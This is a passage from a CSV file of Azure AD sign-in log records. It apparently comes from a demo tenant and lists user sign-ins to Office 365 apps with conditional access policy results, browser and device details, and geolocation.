48.1639518737793}, 'state': 'Washington', 'city': 'Camano'}",none,none,none,none,[],{'errorCode': 0},Sarah Fender,7660009f-6dd0-46e1-a2d9-4c491787dbfc,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,aef039e4-f9d5-4801-81b4-fd2696d91300,SigninLogs,Sucess,48.16395187,-122.4918213
+2050,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:43.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f4c9469f-c0e8-0000-54b3-3fd420db0050,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",8046174b-712f-40d9-9f4e-13cd3e2a1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,8046174b-712f-40d9-9f4e-13cd3e2a1300,SigninLogs,Sucess,41.90428925,-85.99833679
+2051,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:28.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f309118f-5243-483f-87b4-33bb96d3c066,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9e971f1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,03932e54-fdb0-4c07-8405-8b9e971f1300,SigninLogs,Sucess,33.7984581,-84.38828278
+2052,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:37.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,87dae259-fc4f-4ca8-9b81-e8cdb6b0ce42,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9ee5201300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,03932e54-fdb0-4c07-8405-8b9ee5201300,SigninLogs,Sucess,33.7984581,-84.38828278
+2053,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:38.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9dfa91f5-fc0d-4fbf-bd7c-91735b2771b8,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",875c831a-2c9c-4e0a-b7c7-b830d7a01100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,875c831a-2c9c-4e0a-b7c7-b830d7a01100,SigninLogs,Sucess,41.90428925,-85.99833679
+2054,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,40:00.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6f88b617-5360-49c9-8cc5-4fc2e34fadfb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:40,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",34805c5b-6a36-487d-9189-7bc120f41000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,34805c5b-6a36-487d-9189-7bc120f41000,SigninLogs,Sucess,41.90428925,-85.99833679
+2055,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:32.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5d9c265a-69fb-440e-9b79-89deb06b986b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",011e8186-a783-421c-9de9-87206dd51000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,011e8186-a783-421c-9de9-87206dd51000,SigninLogs,Sucess,50.6406517,5.572050095
+2056,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:54.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1c8469f-5022-0000-54b3-3fbeb009e660,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e555e9d8-8e19-4918-91cf-fdbc7e721200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e555e9d8-8e19-4918-91cf-fdbc7e721200,SigninLogs,Sucess,41.90428925,-85.99833679
+2057,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:57.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e4d2d351-7347-45d4-a860-279daa019a56,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bda845b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 